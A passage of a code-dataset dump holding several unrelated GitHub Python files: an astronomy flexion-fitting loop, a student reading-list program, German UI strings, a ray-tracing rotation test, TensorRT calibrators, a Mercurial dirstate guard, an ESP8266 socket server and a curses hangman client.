pd.read_pickle(path_to_cat+prep_file)\n# .. Optional: do not run galaxies of irregular type through Lenser\n#prep_frame = prep_frame[(prep_frame['class'] != 'irregular')]\n# .. Get ID list\nID_list = prep_frame.index.values \n\n# Lenser Analysis Loop\ninit=0\nfor i in ID_list:\n # get the name of object with index i\n objname = prep_frame.name.loc[i] \n print(' \\n')\n print('Object '+str(i)+' - '+objname)\n init+=1\n \n try:\n # Lenser analysis\n print('Running Lenser')\n\n # .. Prepare lists for multi-band fitting\n name_list = []\n dat_list = []\n rms_list = []\n seg_list = []\n psf_list = []\n bg_list = []\n \n for j in range(len(bands)):\n # .. Image name\n imname = objname+'_'+bands[j]\n # .. Read in image from FITS file\n path_to_image = path_to_cat+im_fold[j]+imname+'.fits'\n f = FITS(path_to_image)\n dat = f.get_FITS('data')\n rms = f.get_FITS('noise')\n seg = f.get_FITS('segmask')\n psf = f.get_FITS('psf')\n bg = f.get_FITS('bgmask')\n # .. Append multi-band list\n name_list.append(imname)\n dat_list.append(dat)\n rms_list.append(rms)\n seg_list.append(seg)\n psf_list.append(psf)\n bg_list.append(bg)\n\n # .. Now do multi-fit\n multiname = objname+'_multi_band_fit'\n myMultiImage = MultiImage(namelist = name_list, datalist = dat_list, noiselist = rms_list,\n seglist = seg_list, psflist = psf_list, bgmasklist = bg_list)\n # .. Initialize AIM model\n myModel = aimModel(myMultiImage = myMultiImage)\n # Run local minimization\n myModel.runLocalMinRoutine()\n # Get flexion from fit\n F, G = myModel.psi3ToFlexion()\n F1_fit = F[0]\n F2_fit = F[1]\n G1_fit = G[0]\n G2_fit = G[1]\n # Get size\n a = myModel.size() \n # Get values to save\n fit_pars = np.append(myModel.parsWrapper(), myModel.parsErrorWrapper())\n other_pars = np.array((myModel.chisquared,\n F1_fit, F2_fit,\n G1_fit, G2_fit,\n myModel.I0, a))\n output_vals = np.append(fit_pars, other_pars)\n # Empty model\n myModel.empty()\n\n except:# ValueError:\n print('Error, skipping')\n output_vals = np.nan*np.ones(len(output_params))\n\n # .. Build dictionary for quick, dynamic dataframe building per iteration\n for k,l in zip(col_list,range(len(col_list))):\n if k in output_params: #if output parameter, append value appropriately\n arrs[l].append(output_vals[abs(len(input_params)-l)])\n else:\n sel_id = prep_frame[prep_frame.name==objname].index[0]\n prep_val = prep_frame[k].loc[sel_id]\n arrs[l].append(prep_val)\n # .. Build the dataframe\n data = {k:arrs[l] for k,l in zip(col_list,range(len(col_list)))}\n out_frame = pd.DataFrame(data=data,columns=col_list)\n out_frame.to_pickle(path_to_cat+output_filename+'-'+str(len(ID_list))+'_objects_multi-fit'+condition+'.pkl')\n","repo_name":"DrexelLenser/Lenser","sub_path":"examples/run_cat/lenser_run_cat_multi_fit.py","file_name":"lenser_run_cat_multi_fit.py","file_ext":"py","file_size_in_byte":6253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"10963927959","text":"\"\"\"\r\nName: Reuben Bogogolelo\r\nDate: 27 December 2016 - 11 January 2017\r\nBrief program details:\r\nThis program loads everything on the books.csv and will show the quantity of items in the main(). It consists of 8 functions,\r\nwith one function being main() controlling all other seven functions. The program display the list of required/completed books\r\nbased on user input. The program has been designed to add the new books to the list as in the csv file and make the book from\r\nrequired to completed, which change the value in the list file_list. After the user quits the program, it then reads the file\r\nand then overwrite the list of book in the file books.csv. Its been made (program) to handle the error-checking.\r\n\r\nRepository: https://github.com/reubenbogogolelo.......\r\n\r\n\"\"\"\r\n\r\nfrom operator import itemgetter\r\nFILENAME = \"books.csv\"\r\nINPUT_LIST = ['R','C','A','M','Q']\r\nglobal index_of_Required_Books\r\nindex_of_Required_Books =[]\r\nUserInputToMark = ''\r\nfile_list = []# pls explain wat ths array is supposed to do\r\n#selectedIndex = 0 #for debugging remove later\r\n\r\ndef read_file():\r\n global file_list\r\n file_pointer = open(FILENAME)\r\n for index, data in enumerate (file_pointer.readlines()):\r\n data = data.strip()\r\n datum = data.split(\",\")\r\n file_list.append(datum)\r\n file_list.sort(key=itemgetter(1,2))\r\n file_pointer.close()\r\n return file_list\r\n\r\n\r\ndef print_header(): #this function is designed to list the books as read by read_file() and brings the menu for the user to chose based on their option.\r\n print(\"\"\"\r\nReading list 1.0 - by Reuben\r\n{} books loaded from books.csv\r\n \"\"\".format(len(file_list)))\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n\r\n\r\ndef display_books(selected_input):#this function is designed to display the books marked as completed or required ones as per the users input choice.\r\n counter_one =0\r\n total_pages = 0\r\n global index_of_Required_Books\r\n index_of_Required_Books = []\r\n\r\n if selected_input.upper()=='C': # to take care of the completed books only.\r\n variable_text = \"Completed books:\"\r\n elif selected_input.upper()=='R':# to take care of the required books only.\r\n variable_text = \"Required books:\"\r\n print(variable_text)\r\n\r\n for i in range(0, (len(file_list))):\r\n if file_list[i][3].upper() == selected_input.upper(): #this will Sort the books as they appear on the csv file.\r\n print(\"{}. {:50} by {:20} {} pages\" .format(i, file_list[i][0],file_list[i][1],file_list[i][2]))\r\n index_of_Required_Books.append(int(i))\r\n counter_one +=1\r\n total_pages += int(file_list[i][2])#this will add all the pages of books marked as completed\r\n\r\n\r\n print(\"Total pages for {} book: {} \".format(counter_one, total_pages))\r\n\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n\r\n\r\ndef marking_a_book(selected_input):# has been designed to list the number of a book to mark as completed.\r\n global selectedIndex\r\n if (selected_input == \"M\") or (selected_input == \"m\"):\r\n display_books('r')\r\n print(\"Enter the number of a book to mark as completed\")\r\n while True:\r\n try:\r\n UserInputToMark = int(input(\">>>\"))\r\n break\r\n except ValueError:\r\n print('Invalid input; enter a valid number')\r\n #input choice should be 'm/M' otherwise any other unput will be handled.\r\n print(\r\n \"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n\r\n Flag = False\r\n for i in range(0, (len(index_of_Required_Books))):\r\n\r\n if (index_of_Required_Books[i]) == UserInputToMark:\r\n Flag = True\r\n break\r\n\r\n if Flag == False:\r\n print(\"That book is already completed\")# it will print the text when the flag is False.\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n UserInputToMark = input(\">>>\")\r\n\r\n if UserInputToMark.upper() == \"M\":\r\n display_books('r')\r\n\r\n while True:\r\n try:\r\n global finalMarkingInupt\r\n finalMarkingInupt = int(input(\">>>\"))\r\n\r\n break\r\n except ValueError:\r\n print('Invalid input; enter a valid number')\r\n\r\n for j in range(0, (len(index_of_Required_Books))):\r\n\r\n if index_of_Required_Books[j] == finalMarkingInupt:\r\n file_list[j][3] = \"c\"# will only display the marked as 'c' in the csv file\r\n print(\"{} by {} marked as completed\".format(file_list[j][0], file_list[j][1]))\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n UserInputToMark = input(\">>>\")\r\n if (UserInputToMark.upper() != \"A\") or (UserInputToMark.upper() != \"Q\"):\r\n print(\"Invalid input menu choice\")\r\n\r\n\r\ndef adding_a_book(UserInputToMark):# designed to add a new book.\r\n flag=True\r\n if UserInputToMark.upper() == \"A\": #input should be 'a' only when the user wants to add the new book.\r\n while True:\r\n print(\"Input can not be blank\")\r\n UserInputToMarkTitle = input(\"Title: \")#promts the user to input tittle of the book to be added.\r\n if (UserInputToMarkTitle != \"\"):# input should not be blank\r\n break\r\n\r\n while True:\r\n print(\"Input can not be blank\")\r\n UserInputToMarkAuthor = input(\"Author: \")#promts the user to input the author of the book to be added.\r\n if (UserInputToMarkAuthor != \"\"):#input should not be blank.\r\n break\r\n\r\n while flag:\r\n try:\r\n UserInputToMarkPages = int(input(\"Pages: \"))#promts the user to input the number of pages of a book to be added.\r\n\r\n while UserInputToMarkPages <0:\r\n print(\"Number must be >= 0\")# number of pages should not be less than 0.\r\n UserInputToMarkPages = int(input(\"Pages: \"))\r\n flag=False\r\n except ValueError:\r\n print('Invalid input; enter a valid number')\r\n\r\n AddedBookDetail = []\r\n AddedBookDetail.append(UserInputToMarkTitle)# title will be appended to the list.\r\n AddedBookDetail.append(UserInputToMarkAuthor)# author will be appended to the list.\r\n AddedBookDetail.append(str(UserInputToMarkPages))#pages will be appended to the list.\r\n AddedBookDetail.append('r')\r\n file_list.append(AddedBookDetail)#the book will be appended accordigly.\r\n print('{} by {}, ({}) added to reading list'.format(UserInputToMarkTitle, UserInputToMarkAuthor, UserInputToMarkPages))\r\n print(\r\n \"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n\r\n\r\ndef main():#the main function as the master controller will let the user enter the option.\r\n read_file()# this function will be called\r\n print_header()# this function will be called\r\n highLevelInput = input(\">>>\")# input prompt\r\n\r\n while True:\r\n if (highLevelInput.upper() == 'R') or highLevelInput.upper() == 'C' or highLevelInput.upper() == 'A' or highLevelInput.upper() == 'M' or highLevelInput.upper() == 'Q':\r\n Dummy =1 #Dummy code\r\n else:\r\n print((highLevelInput.upper() != 'R') or highLevelInput.upper() != 'C' or highLevelInput.upper() != 'A' or highLevelInput.upper() != 'M' or highLevelInput.upper() != 'Q')\r\n #print(highLevelInput.upper()!='Q')\r\n while True:\r\n print(\"Invalid Menu Choice\")\r\n print(\"Menu: \\n R - List required books \\n C - List completed books \\n A - Add new book \\n M - Mark a book as completed \\n Q - Quit\")\r\n highLevelInput = input(\">>>\")\r\n if highLevelInput.upper() != 'R' or highLevelInput.upper() != 'C' or highLevelInput.upper() != 'A' or highLevelInput.upper() != 'M' or highLevelInput.upper() != 'Q':\r\n break\r\n\r\n if highLevelInput.upper()=='R':\r\n display_books('r')#if the option is true, then the display() will be called\r\n elif highLevelInput.upper() == 'C':\r\n display_books('c')#if the option is true, then the display() will be called\r\n elif highLevelInput.upper() == 'A':\r\n adding_a_book('a')#if the option is true, then the adding_a_book() function will be called\r\n elif highLevelInput.upper() == 'M':\r\n marking_a_book('m')#if the option is true, then the marking() will be called\r\n highLevelInput = input(\">>>\")#input prompt for the user for all the above functions.\r\n\r\n if (highLevelInput.upper() == \"Q\"): #the choice is restricted to 'Q/q' and will exit the program.\r\n print(\"{} books saved to {}\".format(len(file_list), FILENAME))# this will list all the books in the csv file.\r\n print(\"Have a nice day :)\")\r\n\r\n return\r\n\r\nmain()\r\n\r\n\r\n","repo_name":"rsbogogolelo/ReubenA1","sub_path":"CP1404assignment1.py","file_name":"CP1404assignment1.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42640595787","text":"### Localized Strings ##\n\nHTML_TITLE = \"MicroKIS Staging\"\n\nERR_UNKNOWN = \"Unbekannter Fehler\"\nERR_NO_CON_TO_GW = \"Keine Verbindung zum Gateway! Es wurden keine Daten ans Monitoring gesendet!\"\nERR_BED_DOES_NOT_EXIST = \"Bett existiert nicht!\"\nERR_GW_ASYNC = \"GW Aync Error\"\n\nBEDS_REFRESH_SUCCESS = \"Betten erfolgreich aktualisiert\"\nGW_UPDATE_SENT = \"Aktualisierung an Monitoring gesendet!\"\nBED_FORCE_DELETE = \"Bett wurde entfernt- Force Remove!\"\n\nBTN_DISCHARGE = \"Patient Entlassen\"\nBTN_DETAILS = \"Mehr Infos\"\nBTN_ADMIT = \"Aufnahme\"\nFREE_BED = \"Freies Bett\"\n\nPATIENT_NAME = \"Name\"\nPATIENT_ID = \"Patienten ID\"\nPATIENT_ADMIT_DATE = \"Aufnahme Datum\"\n\nCAPTION_DASHBOARD = \"Übersicht\"\n\nDATAPRIVACY_NOTES = \"Hinweise zum Datenschutz\"\nTERMS_AND_CONDITIONS = \"Nutzungshinweise\"\n\nCAPTION_ADMISSION = \"Patientenaufnahme\"\n\nNEW_PATIENT = \"Neuer Patient\"\nGIVEN_NAME = \"Vorname\"\nLAST_NAME = \"Nachname\"\n\nPATIENT_BED = \"Bett\"\nPATIENT_STATION = \"Station\"\n\nPATIENT_STATUS = \"Patienten Bericht\"\n\n\n############# Localization of Parameter Labels is done Here ####################\n\nLOCALIZED_PARM={}\nLOCALIZED_PARM[\"spo2\"] = \"Sättigung\"\nLOCALIZED_PARM[\"hr\"] = \"HF \"\nLOCALIZED_PARM[\"524288^SPEEDY_TEMP^EHC\"] = \"Stirn Temp\"#\nLOCALIZED_PARM[\"393218^NIBP_MEAN^EHC\"] = \"NIBP Mitteldruck\"\nLOCALIZED_PARM[\"393217^NIBP_DIA^EHC\"] = \"NIBP Diastolisch\"\nLOCALIZED_PARM[\"393216^NIBP_SYS^EHC\"] = \"NIBP Systolisch\"\nLOCALIZED_PARM[\"327680^SPO2_SPO2^EHC\"] = \"Sättigung\"\nLOCALIZED_PARM[\"327681^SPO2_PR^EHC\"] = \"Puls \"\n\n\n\nPARM_COLOR={}\nPARM_COLOR[\"524288^SPEEDY_TEMP^EHC\"] = \"black\"\nPARM_COLOR[\"393218^NIBP_MEAN^EHC\"] = \"purple\"\nPARM_COLOR[\"393217^NIBP_DIA^EHC\"] = \"purple\"\nPARM_COLOR[\"393216^NIBP_SYS^EHC\"] = \"purple\"\nPARM_COLOR[\"327680^SPO2_SPO2^EHC\"] = \"blue\"\nPARM_COLOR[\"327681^SPO2_PR^EHC\"] = \"green \"","repo_name":"Dankredues/microKIS","sub_path":"strings_de.py","file_name":"strings_de.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37384693629","text":"\"\"\"\nTest whether source rotation induces unwanted roll.\n\nTry adjusting source_y_offset with source.angle_type 'vector' (the default) and you will\nnotice an unwanted roll appearing in the source.\n\"\"\"\nimport math\n\nimport pyvista as pv\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_graphics.geometry.transformation.quaternion as quaternion\n\nimport tfrt.sources as sources\nimport tfrt.distributions as distributions\nimport tfrt.drawing as drawing\n\nsource_size = 1.0\ntarget_z_distance = 20.0\ntarget_x_size = 40.0\ntarget_y_size = 40.0\n\n# offset between the center of the source and the center of the target in the x-y plane.\nsource_x_offset = 10.0\nsource_y_offset = 20.0\nsource_angular_cutoff = 15.0\n\nray_sample_count = 35*35\nwavelengths = [drawing.YELLOW]\n\n# =============================================================================\n# Re-interpret some of the above parameters\n\n# convert to radians\nPI = tf.constant(math.pi, dtype=tf.float64)\nsource_angular_cutoff *= PI/180.0\n\n# reduce ray sample count since it needs to be a square number\nsqrt_ray_sample_count = math.floor(math.sqrt(ray_sample_count))\nray_sample_count = sqrt_ray_sample_count*sqrt_ray_sample_count\n\n# actually want the center-to-edge distance, i.e. the 'square radius'.\nsource_size /= 2\n\n# =============================================================================\n# Make the source.\nangle_type = \"quaternion\"\nif angle_type == \"vector\":\n source_angle = np.array(\n (\n 0.0,\n -source_y_offset,\n target_z_distance\n ),\n dtype=np.float64\n )\nelse:\n rot1 = quaternion.from_euler((0.0, -PI/2, 0.0))\n rot2 = quaternion.from_euler(tf.cast(\n (\n math.atan2(source_y_offset, target_z_distance),\n 0.0,\n 0.0\n ),\n dtype=tf.float64\n ))\n source_angle = quaternion.multiply(rot2, rot1)\n \nsource_center = np.array(\n (\n source_x_offset,\n source_y_offset,\n -target_z_distance\n ),\n dtype=np.float64\n)\nangular_distribution = distributions.SquareRankLambertianSphere(\n ray_sample_count,\n source_angular_cutoff\n)\nbase_point_distribution = distributions.RandomUniformSquare(\n source_size,\n sqrt_ray_sample_count\n)\nsource = sources.AngularSource(\n 3,\n source_center,\n source_angle,\n angular_distribution,\n base_point_distribution,\n wavelengths,\n dense=False,\n ray_length=100,\n angle_type=angle_type\n)\n\n# =============================================================================\n# Set up the plot\n\nplot = pv.Plotter()\nplot.add_axes()\nray_drawer = drawing.RayDrawer3D(plot)\n\n# draw a visual target in the x-y plane, for reference\nvisual_target = pv.Plane(\n center=(0, 0, 0),\n direction=(0, 0, 1),\n i_size = target_x_size,\n j_size = target_y_size,\n i_resolution = 1,\n j_resolution = 1\n)\nplot.add_mesh(visual_target, color=\"green\")\n\n# draw a visual backing that the source will slide along, at the proper\n# rotation and offset\nvisual_backing = pv.Plane(\n center=(0.0, .99*source_y_offset, -.99*target_z_distance),\n direction=(0.0, -source_y_offset, target_z_distance),\n i_size = target_y_size,\n j_size = 5*source_size,\n i_resolution = 1,\n j_resolution = 1\n)\nplot.add_mesh(visual_backing, color=\"green\")\n\n# =============================================================================\n# Define the plot interface\n\ndef redraw():\n source.update()\n ray_drawer.rays = source\n ray_drawer.draw()\nredraw()\n\nplot.show()\n\n\n\n","repo_name":"ecpoppenheimer/TensorFlowRayTrace","sub_path":"dev/source_rotation_roll_test.py","file_name":"source_rotation_roll_test.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"25832098510","text":"\"\"\"_summary_\n\n:return: _description_\n:rtype: _type_\n\"\"\"\n\nimport os\n\nimport tensorrt as trt\nimport pycuda.driver as cuda\n\nimport numpy as np\n\nfrom .image_batcher import ImageBatcher # pylint: disable=import-error\nfrom .logger import TrtLogger # pylint: disable=import-error\n\n\nclass CalibratorBase:\n \"\"\"_summary_\n\n :param cache_file: _description_\n :type cache_file: str\n :param logger: _description_\n :type logger: object\n :param quantile: _description_, defaults to 0.5\n :type quantile: float, optional\n :param regression_cutoff: _description_, defaults to 0.5\n :type regression_cutoff: float, optional\n \"\"\"\n\n def __init__(\n self,\n cache_file: str,\n logger: object,\n quantile: float = 0.5,\n regression_cutoff: float = 0.5):\n \"\"\"_summary_\n \"\"\"\n\n self.quantile = quantile\n self.regression_cutoff = regression_cutoff\n\n self.trt_logger = logger\n self.cache_file = cache_file\n self.image_batcher = None\n self._batch_generator = None\n self._batch_allocation = None\n\n def get_regression_cutoff(self):\n \"\"\"\n __summary__\n \"\"\"\n return self.regression_cutoff\n\n def get_quantile(self):\n \"\"\"\n __summary__\n \"\"\"\n return self.quantile\n\n def set_image_batcher(self, image_batcher: ImageBatcher):\n \"\"\"\n __summary__\n \"\"\"\n\n self.image_batcher = image_batcher\n size = int(\n np.dtype(\n self.image_batcher.dtype).itemsize *\n np.prod(\n self.image_batcher.shape))\n self._batch_allocation = cuda.mem_alloc(\n size) # pylint: disable=no-member\n self._batch_generator = self.image_batcher.get_batch()\n\n def get_batch_size(self):\n \"\"\"\n __summary__\n \"\"\"\n\n if self.image_batcher:\n return self.image_batcher.batch_size\n return 1\n\n def get_batch(self, names: object):\n # pylint: disable=unused-argument\n \"\"\"\n __summary__\n \"\"\"\n if not self.image_batcher:\n return None\n try:\n batch, _ = next(self._batch_generator)\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Calibrating image {self.image_batcher.image_index} \\\n/ {self.image_batcher.num_images}\")\n cuda.memcpy_htod( # pylint: disable=no-member\n self._batch_allocation,\n np.ascontiguousarray(batch))\n return [int(self._batch_allocation)]\n\n except StopIteration:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n \"Finished calibration batches\")\n return None\n\n def read_histogram_cache(self, *args):\n # pylint: disable=unused-argument\n \"\"\"\n Overrides from trt.IInt8Calibrator.\n Read the calibration cache file stored on disk, if it exists.\n :return: The contents of the cache file, if any.\n \"\"\"\n if self.cache_file is not None and os.path.exists(self.cache_file):\n with open(self.cache_file, \"rb\") as histogram_file:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Using histogram calibration cache file: \\\n{self.cache_file}\")\n return histogram_file.read()\n else:\n return None\n\n def read_calibration_cache(self):\n \"\"\"\n Overrides from trt.IInt8Calibrator.\n Read the calibration cache file stored on disk, if it exists.\n :return: The contents of the cache file, if any.\n \"\"\"\n if self.cache_file is not None and os.path.exists(self.cache_file):\n with open(self.cache_file, \"rb\") as read_file:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Using calibration cache file: {self.cache_file}\")\n return read_file.read()\n else:\n return None\n\n def write_calibration_cache(self, cache, **kwargs):\n # pylint: disable=unused-argument\n \"\"\"\n Overrides from trt.IInt8Calibrator.\n Store the calibration cache to a file on disk.\n :param cache: The contents of the calibration cache to store.\n \"\"\"\n if self.cache_file is not None:\n with open(self.cache_file, \"wb\") as calib_cache:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Writing calibration cache data to: {self.cache_file}\")\n calib_cache.write(cache)\n\n def write_histogram_cache(self, cache: object):\n \"\"\"\n Overrides from trt.IInt8Calibrator.\n Store the calibration cache to a file on disk.\n :param cache: The contents of the calibration cache to store.\n \"\"\"\n if self.cache_file is not None:\n with open(self.cache_file, \"wb\") as histogram_cache:\n self.trt_logger.log(\n self.trt_logger.Severity.INFO,\n f\"Writing histogram calibration cache data to: \\\n{self.cache_file}\")\n histogram_cache.write(cache)\n\n\nclass IInt8LegacyCalibrator(CalibratorBase, trt.IInt8LegacyCalibrator):\n # pylint: disable=no-member\n \"\"\"_summary_\n\n :param cache_file: _description_\n :type cache_file: str\n :param logger: _description_\n :type logger: object\n :param quantile: _description_, defaults to 0.5\n :type quantile: float, optional\n :param regression_cutoff: _description_, defaults to 0.5\n :type regression_cutoff: float, optional\n \"\"\"\n\n def __init__(self, cache_file: str,\n logger: TrtLogger,\n quantile: float = 0.5,\n regression_cutoff: float = 0.5):\n \"\"\"_summary_\n \"\"\"\n\n trt.IInt8LegacyCalibrator.__init__(self)\n CalibratorBase.__init__(self, cache_file,\n logger, quantile,\n regression_cutoff)\n\n\nclass IInt8EntropyCalibrator(CalibratorBase, trt.IInt8EntropyCalibrator):\n # pylint: disable=no-member\n \"\"\"_summary_\n\n :param CalibratorBase: _description_\n :type CalibratorBase: _type_\n :param trt: _description_\n :type trt: _type_\n \"\"\"\n\n def __init__(self, cache_file: str,\n logger: TrtLogger):\n trt.IInt8EntropyCalibrator.__init__(self)\n CalibratorBase.__init__(self, cache_file, logger)\n\n\nclass IInt8EntropyCalibrator2(CalibratorBase, trt.IInt8EntropyCalibrator2):\n # pylint: disable=no-member\n \"\"\"_summary_\n\n :param CalibratorBase: _description_\n :type CalibratorBase: _type_\n :param trt: _description_\n :type trt: _type_\n \"\"\"\n\n def __init__(self, cache_file: str, logger: TrtLogger):\n trt.IInt8EntropyCalibrator2.__init__(self)\n CalibratorBase.__init__(self, cache_file, logger)\n\n\nclass IInt8MinMaxCalibrator(CalibratorBase, trt.IInt8MinMaxCalibrator):\n # pylint: disable=no-member\n \"\"\"_summary_\n\n :param CalibratorBase: _description_\n :type CalibratorBase: _type_\n :param trt: _description_\n :type trt: _type_\n \"\"\"\n\n def __init__(self, cache_file: str, logger: TrtLogger):\n trt.IInt8MinMaxCalibrator.__init__(self)\n CalibratorBase.__init__(self, cache_file, logger)\n","repo_name":"MaximeDebarbat/Dolphin","sub_path":"dolphin/TrtWrapper/utils/calibrator.py","file_name":"calibrator.py","file_ext":"py","file_size_in_byte":7396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"18227864015","text":"from __future__ import absolute_import\n\nimport os\nfrom .i18n import _\n\nfrom . import (\n error,\n narrowspec,\n requirements,\n util,\n)\n\n\nclass dirstateguard(util.transactional):\n \"\"\"Restore dirstate at unexpected failure.\n\n At the construction, this class does:\n\n - write current ``repo.dirstate`` out, and\n - save ``.hg/dirstate`` into the backup file\n\n This restores ``.hg/dirstate`` from backup file, if ``release()``\n is invoked before ``close()``.\n\n This just removes the backup file at ``close()`` before ``release()``.\n \"\"\"\n\n def __init__(self, repo, name):\n self._repo = repo\n self._active = False\n self._closed = False\n\n def getname(prefix):\n fd, fname = repo.vfs.mkstemp(prefix=prefix)\n os.close(fd)\n return fname\n\n self._backupname = getname(b'dirstate.backup.%s.' % name)\n repo.dirstate.savebackup(repo.currenttransaction(), self._backupname)\n # Don't make this the empty string, things may join it with stuff and\n # blindly try to unlink it, which could be bad.\n self._narrowspecbackupname = None\n if requirements.NARROW_REQUIREMENT in repo.requirements:\n self._narrowspecbackupname = getname(\n b'narrowspec.backup.%s.' % name\n )\n narrowspec.savewcbackup(repo, self._narrowspecbackupname)\n self._active = True\n\n def __del__(self):\n if self._active: # still active\n # this may occur, even if this class is used correctly:\n # for example, releasing other resources like transaction\n # may raise exception before ``dirstateguard.release`` in\n # ``release(tr, ....)``.\n self._abort()\n\n def close(self):\n if not self._active: # already inactivated\n msg = (\n _(b\"can't close already inactivated backup: %s\")\n % self._backupname\n )\n raise error.Abort(msg)\n\n self._repo.dirstate.clearbackup(\n self._repo.currenttransaction(), self._backupname\n )\n if self._narrowspecbackupname:\n narrowspec.clearwcbackup(self._repo, self._narrowspecbackupname)\n self._active = False\n self._closed = True\n\n def _abort(self):\n if self._narrowspecbackupname:\n narrowspec.restorewcbackup(self._repo, self._narrowspecbackupname)\n self._repo.dirstate.restorebackup(\n self._repo.currenttransaction(), self._backupname\n )\n self._active = False\n\n def release(self):\n if not self._closed:\n if not self._active: # already inactivated\n msg = (\n _(b\"can't release already inactivated backup: %s\")\n % self._backupname\n )\n raise error.Abort(msg)\n self._abort()\n","repo_name":"JetBrains/intellij-community","sub_path":"plugins/hg4idea/testData/bin/mercurial/dirstateguard.py","file_name":"dirstateguard.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"15353749655","text":"from upysh import *\r\nimport network\r\nimport socket\r\nimport utime\r\nfrom machine import Pin\r\n\r\np=Pin(2,mode=Pin.IN)\r\nap_if = network.WLAN(network.AP_IF)\r\nap_if.active(False)\r\nap_if.active(True)\r\nap_if.config(essid='ESP8266',password='12345678')\r\n\r\nprint(ap_if.ifconfig()[0])\r\naddr = socket.getaddrinfo('0.0.0.0',80)[0][-1]\r\nstate = 0 #0-stop,1-move\r\nconnect=0\r\ns = socket.socket()\r\ns.bind(addr)\r\ns.listen(1)\r\n\r\ntry: \r\n print(\"连接中.....\")\r\n conn, addr = s.accept()\r\n print('client connected from', addr)\r\n while True:\r\n request = conn.recv(1024)\r\n conn.send(b'1') \r\n \r\nexcept KeyboardInterrupt:\r\n conn.close()","repo_name":"chentuochao/projection-game","sub_path":"AP.py","file_name":"AP.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30323061649","text":"import signal\nimport sys\nimport socket\nimport curses\nfrom curses import wrapper\n\nhost = \"127.0.0.1\"\nport = 12345\n\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nstick_man_parts = [\n (4, 2, \"|\"),\n (5, 2, \"|\"),\n (6, 2, \"O\"),\n (7, 1, \"/\"),\n (7, 2, \"|\"),\n (7, 3, \"\\\\\"),\n (8, 2, \"|\"),\n (9, 2, \"/\"),\n (9, 3, \"\\\\\"),\n]\n\n\ndef signal_handler(sig, frame):\n print('Close client')\n client_socket.close()\n sys.exit(0)\n\n\ndef draw_stick_man(stdscr, attempts):\n for i in range(attempts):\n y, x, char = stick_man_parts[i]\n stdscr.addstr(y, x, char)\n\n\ndef display_message(stdscr, y, message):\n stdscr.move(y, 0)\n stdscr.clrtoeol()\n stdscr.addstr(message)\n stdscr.refresh()\n\n\ndef display_welcome(stdscr):\n display_message(stdscr, 0, \"Welcome to Hangman! Guess a letter.\")\n display_message(stdscr, 1, \"Input letter: \")\n\n\ndef process_response(stdscr, attempts, response):\n if \"Invalid\" in response:\n display_message(stdscr, 3, response)\n elif \"Wrong\" in response:\n attempts += 1\n draw_stick_man(stdscr, attempts)\n display_message(stdscr, 3, response)\n elif \"lose\" in response or \"win\" in response:\n display_exit_message(stdscr, response)\n attempts = -1\n else:\n display_message(stdscr, 2, response)\n return attempts\n\n\ndef display_exit_message(stdscr, response):\n stdscr.move(0, 0)\n stdscr.clrtobot()\n display_message(stdscr, 0, response)\n display_message(stdscr, 1, \"Press any key to exit.\")\n stdscr.refresh()\n stdscr.getch()\n\ndef get_input_letter(stdscr):\n stdscr.move(1, 14)\n guess = chr(stdscr.getch()).lower()\n stdscr.addch(guess)\n stdscr.refresh()\n return guess\n\ndef main(stdscr):\n signal.signal(signal.SIGINT, signal_handler)\n\n client_socket.connect((host, port))\n\n stdscr.clear()\n display_welcome(stdscr)\n stdscr.refresh()\n\n attempts = 0\n while attempts != -1:\n guess = get_input_letter(stdscr)\n\n client_socket.send(guess.encode())\n\n response = client_socket.recv(1024).decode()\n attempts = process_response(stdscr, attempts, response)\n\n client_socket.close()\n\n\nif __name__ == \"__main__\":\n wrapper(main)\n","repo_name":"angelsz1/Programacion_Concurrente-TP","sub_path":"TP1/Integrador/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"19640331834","text":"import os, glob, numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, Dropout\r\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\r\nimport matplotlib.pyplot as plt\r\nimport keras.backend.tensorflow_backend as K\r\nimport tensorflow as tf\r\nfrom tensorflow.python.client import device_lib\r\nfrom keras import optimizers\r\n\r\n#GPU CPU 연산 \r\nconfig = tf.compat.v1.ConfigProto() \r\nconfig.gpu_options.allow_growth = True #allow_growth 옵션: 초기에 메모리를 할당하지 않고 세션을 시작한 후에 더 많은 GPU 메모리가\r\n#필요할때 메모리 영역을 